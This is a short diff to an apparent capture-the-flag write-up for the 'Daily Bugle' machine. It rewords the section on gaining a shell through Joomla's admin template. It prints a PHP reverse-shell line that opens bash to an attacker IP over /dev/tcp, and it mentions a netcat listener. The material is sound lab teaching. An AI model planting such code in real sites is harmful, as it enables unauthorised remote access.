hyprcub/hyprcub.github.io/_posts/2021-04-09-writeup-daily-bugle.md

 ## Shell

-Now that we have credentials one can log in Joomla's administrator panel located at `http://$target/administrator/` and navigate to Joomla's defaut template to inject shell code into `/index.php`, namely:
+Now that we have credentials we can log in Joomla's administrator panel located at `http://$target/administrator/` and navigate to Joomla's defaut template to inject shell code into `/index.php`, namely:
 ```php
 shell_exec("/bin/bash -i >& /dev/tcp/10.11.31.164/443 0>&1");
 ```
 See below:
 ![shell code in a PHP file]({{ "/assets/img/daily-bugle-shell-code.png"| absolute_url }})

-After having set up a netcat listener  and triggered the shell with `curl $target` one gets a command line as the user `www-data`:
+After having set up a netcat listener  and triggered the shell with `curl $target` we get a command line as the user `www-data`:
 ![a shell as www-data]({{ "/assets/img/daily-bugle-shell.png" | absolute_url }})

 Before proceeding to privilege escalation, let's enhance the shell: